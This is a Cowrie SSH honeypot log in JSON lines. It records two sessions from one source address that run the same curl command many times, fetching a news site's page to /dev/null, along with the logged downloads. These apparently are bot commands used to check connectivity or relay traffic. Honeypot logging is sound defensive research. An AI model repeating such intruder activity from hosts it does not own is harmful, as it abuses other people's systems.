{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.845172Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.848160Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.875711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.876953Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.899985Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.901473Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.905071Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.913372Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.922105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.923498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.928051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.945999Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.947285Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.961126Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.962366Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:13.988658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:13.990504Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.000155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.001160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.005301Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.028740Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.029818Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.035691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.036954Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.038683Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.044390Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.049413Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.072452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.073638Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.078523Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.079540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.085333Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.114092Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.115228Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.117296Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.118288Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.132372Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.154213Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.155452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.159489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.160822Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.173445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.197937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.199316Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.202751Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.204155Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.205174Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.238224Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.239463Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.242114Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.243004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.256820Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.273633Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.277286Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.278351Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.280969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.281819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.299121Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.323297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.324598Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.327413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.329379Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.331668Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.347705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.349445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.355697Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.365828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.366968Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.370383Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.371306Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.372082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.374412Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.381732Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.390996Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.402621Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.405602Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.406918Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.408552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.409628Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.414925Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.460305Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.461826Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.466613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.467888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.502497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.503839Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.506922Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.507910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.543299Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
